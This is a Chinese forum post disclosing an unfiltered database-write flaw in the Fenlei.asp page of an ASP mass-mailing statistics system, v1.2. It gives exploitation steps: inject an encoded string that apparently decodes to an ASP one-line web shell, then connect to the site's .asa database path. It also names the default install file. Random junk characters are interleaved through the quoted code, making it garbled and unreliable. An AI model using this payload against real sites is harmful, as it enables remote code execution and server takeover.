找回密码
 立即注册
查看: 2544|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
% H- r. Y# C( ~
4 c7 V, d+ y) jIF Request.QueryString("Action")="del" Then 0 B. N5 H  E6 x- h) _# p/ K
ID=Request.QueryString("ID")
3 J1 x( e% K$ c4 `  F  v+ SIF Countss ("tui","Fenlei",ID )<>0 then 4 o0 U) j. `3 p* |6 I, u
'略 5 Q" i$ n, ^( e" U& a2 y6 T, p
IF Request.QueryString("Action")="Add" Then
/ v6 @3 ?5 w1 v" \Tname=Request.Form("Typename") ( S3 ~% y: @$ ^9 h( \/ ]
Set Rs=Server.CreateObject("adodb.Recordset") ; O9 U8 `- B3 t4 a1 R
Sql="Select * From Fenlei Order by id Desc "
! \; q$ n! z/ ]5 h/ O+ TRs.Open Sql,Conn,1,3 7 Z2 z* o' V7 w- E
Rs.Addnew 6 I# ^6 y9 p+ G/ F' G7 v
Rs("Typename")=Tname
0 W( J; v& u: R! B' J* v2 j) u'略
# }, c# K. d9 Q9 \. B* kSet Rs=Server.CreateObject("adodb.Recordset")
* q7 b# R1 Y' s% {2 USql="Select * From Fenlei Order by id Desc "
+ w: P& u9 W2 Z+ N) `: F1 sRs.Open Sql,Conn,1,1 9 Z4 M, @) e! @- h' D- y; [0 m
'略
" Q: h7 a( X$ Y* i: [%>
1 I1 K$ @4 ^3 C( r. s1 G 3 p0 K5 ^* r7 g- Z+ b
% W* J1 j. w1 k7 e
/ n8 t+ K4 _( S1 q1 M6 i; q
没有过滤,直接写入数据库。. E' S, V3 @5 s
! u0 p  ?" F+ X3 x
利用方法:- N+ ]  }; N1 L: ~: x' y

0 J, C# l7 i  W8 b! A( P9 g0 E插入:┼攠數畣整爠煥敵瑳∨≡┩>. ^% O* \* q) r" L8 K6 c( T
5 z+ @, V) H7 l9 [

6 D; k5 b  V/ K1 L" L' S9 n9 ?连接: http://www.xxx.com/###tongbaner.asa # T) }. T- T# S- U- [
'默认安装文件: 0 ?1 u5 e# B8 P6 E/ K
'install.asp2 }$ y: G1 T4 q: B. e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表